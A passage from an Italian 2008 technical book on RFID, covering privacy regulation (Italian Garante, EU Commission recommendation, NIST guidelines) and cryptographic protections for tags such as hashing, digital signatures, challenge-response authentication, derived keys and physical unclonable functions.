• Italia - marzo 2005Garante per la Protezione dei Dati Personali (Privacy); il documento −Garanzie per l’uso di "Etichette intelligenti" (Rfid) − prescrive le misu-re per rendere il trattamento conforme alle disposizioni vigenti per isoggetti che effettuino trattamenti di dati personali avvalendosi dellatecnologia RFID.- Gli RFID non devono servire per la raccolta di dati personali,a meno che ciò sia assolutamente necessario

- In tal caso, i consumatori devono esserne informati adeguatamente,ed i dati non possono essere utilizzati per altri scopi se non quellidichiarati

• USA - Maggio 2006“Privacy Best Practices for Deployment of RFID Technology” (Centerfor Democracy and Technology)

• Commissione UE - luglio ÷ settembre 2006lancio di una Consultazione pubblica su RFID

• Commissione UE - marzo 2007risultati della Consultazione pubblica comunicati dalla Commissione alParlamento Europeo, al Consiglio, al Comitato Economico e Sociale edal Comitato delle Regioni con la Comunicazione:- “Radio Frequency Identification (RFID) in Europe: steps towards apolicy framework”e l’allegato “Commission Staff WorkingDocument–Results of The Public Online Consultation on FutureRadio Frequency Identification Technology Policy – The RFIDRevolution: Your voice on the Challenges, Opportunities andThreats”Un aspetto importante dei risultati della consultazione è il concettodi “privacy by design” cioè nell’adozione di criteri di progettazionedei sistemi che trattano dati personali e dunque anche dei sistemiRFID che evitino (o riducano al minimo) ex ante i rischi di privacye sicurezza non solo a livello tecnologico ma anche a livello organiz-zativo e di processi di business. Inoltre ciò significa tenere costante-mente sotto controllo le nuove minacce di sicurezza così da poteradottare, prima possibile, le migliori contromisure disponibili.

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 367

Page 353: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva368

I sistemi informativi che utilizzano (o si basano su RFID) ed i relati-vi rischi in ordine alla sicurezza e alla privacy sono in continuo svi-luppo e richiedono un continuo assessment e monitoring, sulla basedi linee guida chiare e condivise, conformi al quadro regolatorio edagli ultimi sviluppi della ricerca.Gli specifici rischi di sicurezza e privacy dipendono in larga misuradalla natura delle applicazioni RFID sotto esame: un approcciogeneralista (“a one-size-fits-all approach”) non è in questo casoauspicabile; occorre viceversa una analisi di dettaglio dei costi e deibenefici sia dei rischi sia delle contromisure adottabili prima dell’a-dozione di una specifica soluzione RFID.

• NIST (National Institute for Science and Technology, USA) - aprile 2007“Guidelines for Securing Radio Frequency Identification (RFID)Systems”,linee guida che contengono anche una prima elencazione deiprincipali rischi che tale tecnologia presenta per la privacy. Il testo ana-lizza i rischi di sicurezza e di privacy connessi ai sistemi RFID e forni-sce una serie di suggerimenti per proteggere le informazioni, anche sen-sibili, che utilizzano tale tecnologia.

• Consiglio di Ministri UE - 7 giugno 2007riunione per una proposta una strategia europea per le etichette intel-ligenti a radiofrequenza

• Parlamento Europeo, Scientific Technology Options AssessmentSTOA - giugno 2007“RFID and Identity Management in Everyday Life,Striking the balan-ce between convenience, choice and control”prodotto da un progettocommissionato dallo STOA (organismo di valutazione delle opzioniscientifiche e tecnologiche del Parlamento Europeo). Basato sull’anali-si di 24 “case study” questo studio fornisce un quadro di come vienepercepita la tecnologia RFID dai consumatori e da chi la gestisce, pre-figura un possibile scenario evolutivo identificando alcune tematiche dirilievo per la tutela della privacy. La ricerca si conclude formulando leseguenti raccomandazioni:- gli utenti RFID devono sapere cosa hanno la possibilità e il diritto difare con i loro dati i gestori di sistemi RFID;

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 368

Page 354: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID369

- gli utenti RFID devono partecipare allo sviluppo di nuovi ambientiRFID;

- la responsabilità della gestione dei dati deve essere indicata inmaniera chiara nei casi in cui sono raggruppati dati personali raccol-ti da diversi sistemi RFID;

- le linee guida sulla privacy e i concetti dei dati personali e dell'auto-determinazione informativa devono essere riesaminati alla luce di unambiente sempre più interattivo;

- i governi devono assumere una posizione chiara sulla possibilità chevengano estratte grandi quantità di dati RFID a scopi investigativi.

A proposito della strategia della Commissione UE, nel documento, giàcitato in precedenza, contenente i risultati della Consultazione Pubblicadel 2006 vengono preannunciate, una serie di azioni relative a:• Sicurezza e Privacy,la Commissione supporterà la produzione di una serie di linee guida ditipo “application-specific” (codici di condotta, good practices) da partedi un gruppo di esperti.

• Spettro radio,dopo le recenti decisioni relative alle frequenze in banda UHF nonrisultano particolari problematiche aperte. Eventuali “long term requi-rements” provenienti dalle industrie potranno essere presi in conside-razione.

• Ricerca e politiche di innovazione,oltre a far riferimento ad alcuni temi inclusi nel 7° Programma Quadro(2007-2013) nei quali la tecnologia RFID gioca un ruolo di primariaimportanza, vengono preannunciate ulteriori iniziative su temi di ricercaspecifici quali lo sviluppo di protocolli di sicurezza “leggeri”, algoritmiavanzati per lo scambio di chiavi e, più genericamente, qualsiasi metodo-logia volta a rafforzare la Privacy.

• Standardizzazione,si richiamano gli attori coinvolti ad assicurarsi che gli Standard disponi-bili siano in grado di soddisfare i requisiti normativi definiti a livelloeuropeo, e nel caso, ad attivarsi per colmare le eventuali mancanze.

• Governance.

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 369

Page 355: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva370

Nello stesso documento si prefigura una road map di azioni:• nel 2007 la Commissione istituisce un Gruppo di Lavoro “StakeholderGroup” (RFID Expert Group) delle parti interessate alla tecnologiaRFID incaricato di consigliarla e assisterla nell'elaborazione di unastrategia europea in materia di applicazioni RFID. A tale elaborazionepartecipa, tra gli altri, il gruppo di lavoro “articolo 29”;

• entro la metà del 2007 la Commissione proporrà, nell'ambito del riesa-me delle norme comunitarie sulle telecomunicazioni, alcune modifichealla direttiva relativa alla vita privata e alle comunicazioni elettroniche(ePrivacy), per tenere conto delle applicazioni RFID;

• entro la fine del 2007 la Commissione avrebbero dovuto pubblicare unaRaccomandazione relativa alla sicurezza dei dati e alla tutela della vitaprivata in materia di etichette radio intelligenti, destinata agli Stati mem-bri e alle parti interessate. La direttiva sulla protezione dei dati e la diret-tiva relativa alla vita privata e alle comunicazioni elettroniche fissanonorme per il trattamento dei dati personali che devono essere rispettateindipendentemente dalle tecnologie utilizzate. La raccomandazionemirerà a chiarire la loro applicazione nel contesto della tecnologia RFID;

• in collaborazione con l’RFID Expert Group, la Commissione analizze-rà gli effetti economici e sociali delle etichette radio intelligenti e di altretecnologie, con particolare attenzione alla tutela della vita privata, allafiducia dei cittadini e alla gestione pubblica. Tale analisi porterà, entrola fine del 2008, ad una Comunicazione che valuterà le possibili opzio-ni politiche e le ulteriori misure legislative eventualmente necessarie.Il gruppo di lavoro RFID Expert Group ha iniziato i propri lavori nel

mese di giugno 2007.Nel mese di Febbraio 2008 la Commissione ha prodotto una bozza di

Raccomandazione “Draft Recommendation on the implementation ofprivacy, data protection and information security principles in applica-tions supported by Radio Frequency Identification (RFID)”“Commission Recommendation on the implementation of privacy,

data protection and information security principles in applications sup-ported by radio-frequency identification – “RFID Privacy, DataProtection and Security Recommendation” sulla quale ha richiesto com-

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 370

Page 356: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID371

menti, entro il 25 aprile 2008, a tutte le parti interessate(http://ec.europa.eu/yourvoice/ipm/forms/dispatch? form=RFIDRec).La Commissione prevede l’adozione della Raccomandazione entro l’esta-te del 2008.I risultati della consultazione, hanno di recente portato ad una bozza

di raccomandazione che viene illustrata nel paragrafo seguente.

4.2.1 La Raccomandazione della Commissione UE sulla privacy nei sistemi

RFID

Nel giugno 2008 si sono svolte in sede comunitaria ulteriori riunioni perl’approvazione della “RFID Privacy, Data Protection and SecurityRecommendation” citata in precedenza.La scelta della Raccomandazione, anziché della “Decisione” indica

ancora qualche perplessità sui provvedimenti da adottare e, di conse-guenza, la volontà di indicare agli stati membri linee guida anziché pre-scrizioni obbligatorie.Allo stato attuale la bozza [165] è composta da 12 articoli e le princi-

pali contenuti sono le seguenti:– Articolo 1, Scopo:La raccomandazione si propone di fornire linee guide agli StatiMembri ed alle parti interessate sulle modalità di realizzazione e digestione delle applicazioni RFID.In particolare le applicazioni RFID devono essere realizzate in manie-ra conforme alle leggi, eticamente ammissibile, socialmente e politica-mente accettabile nel rispetto del diritto alla privacy e, soprattutto,garantendo protezione dei dati personali ed appropriata sicurezzadelle informazioni.La raccomandazione stabilisce le misure da adottare relativamenteall’implementazione delle applicazioni RFID in modo da assicurareche la legislazione nazionale si conformi alle Direttive 95/46/EC,[166], 99/5/EC, [167] e 2002/58/EC, [168], alle quali si fa comunqueriferimento per ogni prescrizione riguardante il trattamento dei datipersonali.

– Articolo 3, Misure per la Privacy e per la Protezione dei Dati:

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 371

Page 357: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva372

Si prevede una verifica (assessment) dell’impatto sulla Privacy primache un’applicazione RFID sia messa in opera. Si prescrive che taleverifica venga eseguita a regola d’arte (good practice) secondo moda-lità trasparenti definite da accordi tra i soggetti coinvolti e consultan-do le autorità preposte alla supervisione della protezione dei dati. Siprescrive, inoltre, che gli attori coinvolti nella produzione, gestione omanutenzione di applicazioni RFID (RFID application operators)indichino un soggetto responsabile delle procedure previste.

– Articolo 4, Codici di Condotta:Si invitano gli Stati Membri ad incoraggiare gli attori interessati ed inparticolare le organizzazioni di settore a produrre e rendere pubblichelinee guida dettagliate riguardanti l’implementazione e l’uso delle tec-nologie RFID attraverso la stesura di opportuni Codici di Condotta(sia a livello comunitario, sia nazionale). Si suggerisce che tale lavorosia eseguito in collaborazione con le oganizzazioni dei consumatori, isindacati e le autorità competenti.Si prevede che, in conformità alla Direttiva 95/46/EC, Codici diCondotta nazionali siano sottoposti all’approvazione delle autoritànazionali preposte alla supervisione della protezione dei dati e cheCodici di Condotta comunitari siano sottoposti al Gruppo Articolo 21per l’adozione a livello comunitario.

– Articolo 5, Informazione sull’uso di RFID:Nel caso in cui i sistemi RFID siano utilizzati in luoghi pubblici, gliattori coinvolti nella produzione, gestione o manutenzione dell’appli-cazione RFID (RFID application operators) devono rendere disponi-bile al pubblico una descrizione scritta e comprensibile della politicariguardante l’uso dell’applicazione RFID. Nella descrizione devonoessere indicate, tra l’altro, le informazioni previste nella Direttive95/46/EC e 2002/58/EC.Inoltre, la presenza di Readers in luoghi pubblici deve essere indicatacon un simbolo armonizzato.

– Articolo 6, Gestione della sicurezza delle informazioni e dei relativirischi:Si prevede, tra l’altro, la certificazione o l’autocertificazione del pro-

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 372

Page 358: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

duttore, gestore o manutentore di applicazioni RFID al fine di garan-tire la presenza di un appropriato livello di privacy e di sicurezza del-l’informazione in relazione al rischio insito nell’applicazione medesi-ma.

– Articolo 7, Uso di RFID nella vendita al dettaglio:Si prevede l’adozione di un simbolo armonizzato per indicare ai con-sumatori la presenza di un TAG RFID nei prodotti al dettaglio.Nel caso in cui l’applicazione RFID tratti dati personali il rivenditoredeve assicurarsi che il trattamento sia legittimo come specificato dallaDirettiva 95/46 e deve disattivare il TAG nel punto vendita a meno diun’esplicita richiesta del consumatore di mantenerlo operativo.Nel caso invece in cui l’applicazione RFID non tratti dati personali, ilrivenditore ha il solo obbligo di mettere a disposizione del consuma-tore un sistema, facilmente accessibile, per rimuovere o disattivare ilTAG.

– Articolo10, Follow up:Si prevede che gli Stati Membri informino la Commissione Europeadopo 18 mesi dalla pubblicazione della raccomandazione sulle azioniintraprese in risposta ad essa.

A conclusione del paragrafo, si riportano ora alcuni commenti edosservazioni relativamente alle prescrizioni elencate in precedenza:– al fine di evitare che l’assessment preventivo previsto dall’Articolo 3 sitraduca in un aggravio burocratico ed in un incremento di costi rilevan-te, in particolare per le piccole aziende produttrici di applicazioni, e perla Pubblica Amministrazione (cui spetta l’onere delle verifiche), sidovrebbe limitare tale pratica solamente a casi particolarmente critici (ades. trattamento di dati personali in applicazioni mediche) prevedendoinoltre, in questi casi, formulari standard e semplificazioni burocratiche.In alternativa, un peso maggiore da attribuire al riferimento normati-vo costituito dai Codici di Condotta (Articolo 4), che dovrebbero con-tenere regole chiare seppur stringenti, appare più in linea con politi-che di efficienza.Considerazioni simili valgono per la certificazione (o autocertificazio-

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID373

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 373

Page 359: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

ne) degli operatori prevista dall’Articolo 6).– Con riferimento all’Articolo 7, per quanto concerne il caso in cui iTAG memorizzino informazioni personali, va osservato che la memo-rizzazione di questo tipo di dati nel TAG è limitata a classi ristrette diapplicazioni (tipicamente quelle medicali) per le quali sicuramentevarranno le prescrizioni della Raccomandazione.Tuttavia, applicazioni che trattano dati personali sono correntementein uso nella vendita al dettaglio quando i consumatori fanno uso dicarte di fedeltà (loyalty card) (o di carte di credito, seppur con gradodi sicurezza più elevato). In tal caso i dati personali non sono memo-rizzati nei TAG ma nelle basi di dati delle applicazioni.Una possibile prescrizione a tutela della privacy (non prevista peròdalla Raccomandazione), potrebbe essere, in questo caso, la proibizio-ne (eventualmente attraverso i Codici di Condotta previstidall’Articolo 4) della correlazione tra un singolo oggetto ed il singoloconsumatore. Questo è facilmente attuabile escludendo dalle basi didati quella parte del codice EPG che consente di identificare il singo-lo oggetto e consentendo invece, come già accade con i codici a barre,la correlazione tra il consumatore ed una classe di oggetti (identifica-ta dalle prime cifre del codice EPG).

– Sempre relativamente all’Articolo 7, con riferimento al caso in cui leapplicazioni non trattino dati personali, si osserva che:La Raccomandazione prescrive solamente la disponibilità di un mec-canismo di disabilitazione nel punto vendita, non l’obbligatorietàdella disabilitazione medesima.

Il meccanismo suddetto è facilmente realizzabile (un reader a dispo-sizione del pubblico dopo le casse di pagamento) nel caso di TAGUHF Gen2 che possiedono un apposito comando (kill, cfr.§ 8.5.4);per i TAG HF ed LF non esiste un analogo comando standardizza-to e TAG di questo tipo che integrino detto comando potrebberoessere disponibili solo in un futuro seppur prossimo.

Per quanto riguarda invece la disabilitazione fisica (ad esembiomediante rimozione del TAG o solo della sua antenna) tale mecca-nismo, seppur utile soprattutto per fornire al consumatore la confer-

RFID - Fondamenti di una tecnologia silenziosamente pervasiva374

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 374

Page 360: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

ma “fisica” dell’avvenuta rimozione, non è sempre attuabile, tipica-mente nel caso di TAG affogati nel materiale con cui sono costruitigli oggetti.

CONCLUSIONI SULLA PRIVACY

Al termine del paragrafo sulla privacy, che ad una prima lettura potrebbeindurre a considerazioni allarmistiche, va sottolineato che oggi questotipo di threat costituisce più argomento di dibattito che reale minaccia.Questo perché solo una piccola percentuale delle merci è dotata di

TAG e, di questa parte, la frazione maggioritaria ha il TAG applicato sullaconfezione dell’oggetto e non sull’oggetto medesimo.Inoltre le applicazioni di TAG su oggetti potenzialmente più critici

(banconote, pubblicazioni, documenti) sono solo sporadiche eccezioni.Questi fatti da un lato consentono di sviluppare il dibattito con sereni-

tà, anche per gli attacchi potenzialmente più pericolosi, dall’altro nondevono costituire un pretesto per ignorare le minacce o minimizzarnepotenziali conseguenze.Questo paragrafo sugli attacchi alla privacy, si può quindi concludere

con il motto: “Chi ha tempo non aspetti tempo”.

TECNICHE CRITTOGRAFICHE DI SICUREZZA NEI SISTEMIRFID“If you think that cryptography solves your problem, you don’t understandcryptography and you don’t understand the problem” (B. Schneier)Tutti gli scenari precedenti costituiscono rischi potenziali se nessun mec-canismo di sicurezza è realizzato nei TAG e nei Reader. L’importanza diproteggere i dati nella catena di distribuzione dipende dall’applicazione edalla strategia aziendale nei riguardi della sicurezza. Come è noto, in alcu-ni casi esistono vincoli legislativi.L’obiettivo principale dei sistemi di sicurezza per RFID è proteggere i

dati immagazzinati in un TAG (o in un sistema di gestione) per evitare chesoggetti non autorizzati possano compiere operazioni quali:

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID375

VIII.4.3

VIII.5

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 375

Page 361: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

• Ottenere accesso per conoscere il contenuto dei dati.• Ottenere accesso per modificare / danneggiare / cancellare il contenu-to dei dati.

• Copiare il contenuto su un altro TAG (clonazione).In un sistema sicuro la protezione dei dati è estesa anche a quanto tra-

sferito dal/verso il sistema di gestione (ad esempio la sicurezza dei datipuò essere compromessa non solo alterandoli nel TAG ma anche interve-nendo sul Reader o sul sistema di gestione).Tuttavia anche il più semplice meccanismo di sicurezza necessita di

funzioni dedicate e questo provoca un incremento dei costi dei TAG. Ciòva nella direzione opposta all’attuale tendenza di produrre TAG di prez-zo sempre più ridotto. Ogni azienda si confronta quindi con un compro-messo tra l’uso di TAG economici ed insicuri e il rischio di sicurezza checiò può comportare.

AUTENTICAZIONE PASSIVA – VALIDAZIONE DEI DATI

5.1.1 Funzioni hash

Una funzione hash consiste in una particolare trasformazione matematicache, applicata ad una stringa di dati di qualsivoglia lunghezza, ne generala cosiddetta impronta (hash sum): ossia un “riassunto” costituito da unnumero fisso, costante e predeterminato di bit (20 byte nel caso di SHA-1), che rappresenta univocamente il documento di partenza. Una verificadell'integrità delle stringa si ottiene se l’impronta è uguale prima e dopola trasmissione. È comunque il caso di ricordare che i cosiddettiChecksums e CRC (cyclic redundancy checks) usati per verificare l’inte-grità dei messaggi, sono abbastanza differenti dalle funzion hash critto-grafiche e generalmente meno sicuri.In crittografia vengono usate delle funzioni hash crittografiche dotate

di particolari proprietà di sicurezza, tali da poterle usare per scopi diautenticazione e verifica dell’integrità delle informazioni. Tali proprietàverranno illustrate nell’appendice C di questo libro.In Figura VIII.12 è illustrata l’applicazione di una tipica funzione hash,

RFID - Fondamenti di una tecnologia silenziosamente pervasiva376

VIII.5.1

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 376

Page 362: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

SHA-1, con i risultati dell’impronta (“hash sum”) in esadecimale relativa-mente a differenti stringhe in ingresso. Da notare che:

• L’impronta ha sempre la stessa lunghezza qualsiasi sia la lunghezza deltesto in ingresso;

• Piccole differenze nel testo in ingresso portano a impronte completa-mente differenti.

5.1.2 Firma digitale

Per “mettere in sicurezza” una stringa di dati (un documento o, nel casoin questione, il contenuto di un TAG) si possono usare sistemi di firmadigitale. Per sommi capi questi sono costituiti da due componenti:• una funzione hash;• un’infrastruttura di crittografia a chiave pubblica (crittografia asimme-trica, chiave pubblica e chiave privata).Nella firma digitale la crittografia asimmetrica viene usata “al contrario”;

l’uso tradizionale prevede infatti di cifrare un messaggio, destinato alla tra-smissione, con la chiave pubblica e trasmetterlo liberamente, essendo certiche solo il destinatario, in possesso della chiave privata potrà decifrarlo.Nelle firma digitale, invece, l’“impronta”, generata con la funzione

hash, viene cifrata con la chiave privata del firmatario per produrre quel-

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID377

Figura VIII.12Esempio di applicazione di funzione hash(SHA-1) [Wikipedia by David Göthberg,

Sweden]

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 377

Page 363: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

la che si definisce la firma digitale associata alla stringa (documento), neicasi in questione memorizzata nel TAG.All’atto della lettura del TAG, per verificare la firma, questa viene deci-

frata con la chiave pubblica, ottenendo l’impronta della stringa originaria;quindi la verifica si completa ricalcolando l’impronta della stringa sottoverifica e riscontrando l’uguaglianza delle due impronte.Come detto in precedenza, l’apposizione della firma digitale dei dati

sul TAG è nota come autenticazione passiva. In realtà costituisce un otti-mo metodo per validare i dati contenuti nel TAG che dovrebbero risulta-re immuni da alterazioni. Il metodo è adatto ai TAG passivi a basso costo,richiedendo solo lo spazio aggiuntivo in memoria per la firma.L’elaborazione dei dati è interamente a carico del Reader, sia in fase discrittura (per firmare) sia in lettura (per validare). L’implementazione delsistema non riguarda pertanto la struttura del TAG, ma viene effettuatadal software di integrazione del sistema.Purtroppo, come si è detto, l’autenticazione passiva non contrasta la

clonazione, potendo i dati venire copiati assieme alla firma.

AUTENTICAZIONE ATTIVA

È una caratteristica dei sistemi ad elevato grado di sicurezza (pagamento,biglietti, controllo accessi avanzato) nei quali, oltre alla validazione dei dati,devono essere evitate letture fraudolente dei TAG per evitare clonazioni.L’autenticazione è, in genere, il primo passo da compiere per una proce-

dura di sicurezza realmente efficace. Lo scopo dell’autenticazione è il mutuoriconoscimento tra TAG e Reader, escludendo false identità e clonazioni.Una volta accertata l’identità, si potrà procedere allo scambio dati con

due modalità:• Predisporre un canale criptato di comunicazione (canale sicuro cfr. §VIII.5.3)per uno scambio dati protetto oltre la semplice identificazione del TAG.

• Leggere semplicemente il TAG, che può contenere dati criptati (confunzioni hash e firma elettronica).Questo, come si è detto, è poco costoso (richiede solo una piccola

capacità di memoria aggiuntiva e nessuna elaborazione da parte del

RFID - Fondamenti di una tecnologia silenziosamente pervasiva378

VIII.5.2

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 378

Page 364: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

TAG), protegge però solo l’alterazione dei dati; non protegge, però, dallaclonazione integrale del TAG.Esistono due principali tecniche di autenticazione:

− Mutual symmetrical keys.− Derived keys.

5.2.1 Mutual symmetrical keys

La tecnica mutual symmetrical keys è descritta in ISO/IEC 9798-2“Mechanisms using symmetric encipherements algorithms”. Il protocolloprevede che entrambi i soggetti (Reader e TAG) verifichino reciproca-mente la conoscenza di una chiave segreta. Tale protocollo fa parte dellaclasse di protocolli di autenticazione del tipo “challange-response”, chedefiniscono lo scambio di uno o più messaggi tra l’entità che vuole dimo-strare la sua identità (claimant) e l’entità che deve verificarla (verifier).In uno scenario tipico il verifier invia al claimant un messaggio contenen-

te un valore impredicibile (pseudocasuale) ed il claimant è richiesto di invia-re un messaggio di risposta che dipende dal suddetto valore e dal segretocondiviso (chiave segreta di cui entrambe le entità sono a conoscenza).Dopo tale fase di mutua autenticazione le comunicazioni tra le due

entità avvengono in modalità criptata (con l’impiego della chiave segretadi cui sono entrambe a conoscenza). Questo approccio trova spessoimpiego nelle carte elettroniche senza contatto, ad esempio le cosiddetteProximity Cards definite in ISO/IEC 14443.In realtà lo standard 14443 non prevede esplicite funzionalità per

implementare la sicurezza. Tuttavia procedure ad elevato grado di sicu-rezza, standard o proprietarie, necessarie ad esempio nel caso di trans-azioni finanziarie, possono essere realizzate attraverso l’impiego degli ele-menti protocollari definiti nella parte 4 di ISO/IEC 14443 denominata“Transmission Protocols”. Un esempio molto noto di questo tipo di rea-lizzazioni sono le cosiddette carte MIFARE che sono basate suISO/IEC14443 ed implementano per la sicurezza (invece dell’ISO/IEC9798-2) procedure protocollari e algoritmi crittografici proprietari(Philips – Austria) per l’autenticazione e la cifratura dei dati.Una situazione analoga si ha nel caso delle cosiddette Vicinity Cards

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID379

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 379

Page 365: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

definite nello standard ISO/IEC 15693. Anche qui lo standard definisce iparametri di interfaccia, le codifiche dei dati e la struttura dei comandima non definisce soluzioni per la sicurezza.In passato venne effettuato un tentativo di varare una parte 4 di

ISO/IEC 15693 denominata “Extended command set and security featu-res”, definendo un protocollo di autenticazione del tipo “challange-response” basato sull’impiego degli standard DES o 3DES. Il tentativo,però, non ebbe successo.Si deve ricordare che comandi ed elementi procedurali per l’implemen-

tazione di funzionalità di sicurezza in carte con o senza contatto sono defi-nite nelle parti 4 ed 8 dello standard ISO/IEC 7816 denominate rispetti-vamente “Organization, security and commands for interchange” e“Commands for security operations”. Sebbene alcune parti dello stan-dard ISO/IEC 7816 si riferiscano specificamente alle carte con contatto(“Identification cards -- Integrated circuit(s) cards with contacts”), quel-le citate risultano indipendenti dalla tecnologia fisica di interfaccia (si rife-riscono infatti in modo generico a “Identification cards -- Integrated cir-cuit cards”) e possono essere applicate quindi sia alle carte cui si accedetramite contatto, sia a quelle con accesso a radio frequenza.Anche in tal caso tuttavia, lo standard definisce solamente insiemi di

comandi di tipo generale lasciando alle implementazioni la scelta deglialgoritmi crittografici specifici per realizzare le caratteristiche di sicurezzadesiderate. In tale ambito si può ricordare l’esistenza di importanti stan-dard proprietari per applicazioni specifiche, pur basati su ISO/IEC 7816,come ad esempio il cosiddetto EMV (2000) “Integrated Circuit CardSpecification for Payment Systems” del consorzio formato da Europay,Mastercard e Visa, per applicazioni di pagamento elettronico.Le procedure di sicurezza di molti degli attuali sistemi di carte con e

senza contatto sono quindi basate su algoritmi crittografici proprietaricon caratteristiche non note nemmeno agli integratori dei sistemi, chequindi non hanno possibilità di giudicare il grado di robustezza dei siste-mi medesimi.Sono proprio le differenze nel modo in cui la sicurezza è implementa-

ta il motivo principale per cui le carte senza contatto e i Reader pur con-formi ad un medesimo standard non sono spesso interoperabili.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva380

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 380

Page 366: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Oltre ai problemi di incompatibilità, si deve rilevare che protocolli ealgoritmi per l’autenticazione e la cifratura, come quelli definiti inISO/IEC 9798-2 o simili, sono difficilmente realizzabili nelle etichetteRFID passive a causa dell’elevato consumo di energia dei relativi circuitie dell’incremento dei costi; inoltre la grande quantità di TAG coinvoltirenderebbe problematica la gestione delle chiavi.Comunque, da un punto di vista strettamente protocollare, la realizza-

zione di una procedura di autenticazione del tipo “challenge-response” èpossibile anche per i TAG conformi allo standard ISO/IEC 18000. Le pro-cedure di comunicazione definite da tale standard prevedono infatti unarichiesta da parte del Reader ed una risposta da parte del TAG. L’aggiuntadi un comando di richiesta di autenticazione come descritto in preceden-za, è possibile, nell’ambito di una particolare applicazione, utilizzando lapossibilità offerta dallo standard di definire “custom command”.Tuttavia, per etichette a basso costo, le cui quantità possono essere

misurate in milioni di pezzi per singole forniture, la chiave (segreto con-diviso) dovrebbe essere unica almeno per singole tipologie di oggetti enota lungo tutta la catena di distribuzione. A questo punto si verifica unaalta probabilità che la chiave venga scoperta provocando la caduta globa-le della sicurezza, a meno che il “segreto condiviso” non venga “conte-stualizzato” (cambiato ad ogni passaggio di locazione fisica). In questomodo il segreto verrebbe conosciuto solo dal detentore (momentaneo)della merce che lo ha implementato e, all’atto del passaggio, dal detento-re successivo, che però dovrebbe cambiarlo immediatamente.Inoltre il prezzo da pagare per questa tecnologia, consiste in una non

piccola capacità elaborativa in tempo reale del TAG.

5.2.2 Derived keys

La seconda delle tecniche citate, molto usata per la sua semplicità, è notacome “derived keys”, questa tecnica permette di derivare una chiave“personalizzata” per ogni coppia di apparati che comunicano, senzanecessità di una vera e propria procedura di autenticazione.La chiave personalizzata, infatti, è derivata a partire dal un parametro

non segreto (ad esempio il numero di serie di uno dei due apparati) cheviene richiesto e trasmesso pubblicamente e da un “segreto condiviso”

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID381

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 381

Page 367: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

(master key) che non viene mai trasmesso essendo contenuto nel firmwa-re in tutti gli apparati.Nel caso di RFID il Reader richiede al TAG il proprio numero di serie

(unico a livello mondiale) e, attraverso questo ed il “segreto condiviso”calcola una chiave specifica per ciascun TAG. Il TAG, da parte sua, ne ègià a conoscenza, conoscendo il proprio identificativo ed il “segreto con-diviso”. Un aggressore in ascolto, intercetterebbe l’identificativo del TAGma non potrebbe risalire alla chiave personalizzata non conoscendo il“segreto condiviso”.Oltre ad essere efficace questa tecnica ha il vantaggio di richiedere scar-

sa elaborazione da parte del TAG.

5.2.3 Autenticazione attraverso “Physical Unclonable Function”

Di recente sono state oggetto di brevetti e di citazioni in letteratura, dellefunzioni casuali che hanno la particolarità di essere ricavate da parametrifisici affini al TAG. Questo le rende resistenti al Tampering e, soprattut-to, alla clonazione.Si tratta dei PUF (Physical Unclonable Function) attraverso i quali è

possibile creare un ambiente resistente ai threat in cui TAG e Reader pos-sano autenticarsi. Una volta autenticate, le due entità possono usare un“segreto condiviso” per stabilire un “canale sicuro” di comunicazione(cfr. §VIII.5.3), senza bisogno di scambiarselo.Il PUF, per la sua natura fisica, è casuale e dovrebbe quindi essere irri-

producibile, da qui la sua asserita inclonabilità; viene pertanto anche chia-mato “Physical Randon Function”.Viene usato sempre in simbiosi con una funzione di controllo algorit-

mica che è l’unica entità che può accedervi e governa l’ingresso e l’uscitadei dati dal sottosistema PUF. In pratica, il PUF fisico e la sua funzione dicontrollo costituiscono un tutt’uno inscindibile ed associato al TAG.Naturalmente per la fisicità e la casualità del PUF ogni TAG nasce, in pro-duzione, con un PUF diverso.Il sottosistema PUF + funzione di controllo lavora come un sistema

crittografico: tipicamente se interrogato, fornisce una risposta univoca maimpredicibile perché dipendente dalla domanda e dai parametri fisici delPUF medesimo. Questi, per loro natura, non sono né accessibili né ripro-

RFID - Fondamenti di una tecnologia silenziosamente pervasiva382

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 382

Page 368: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

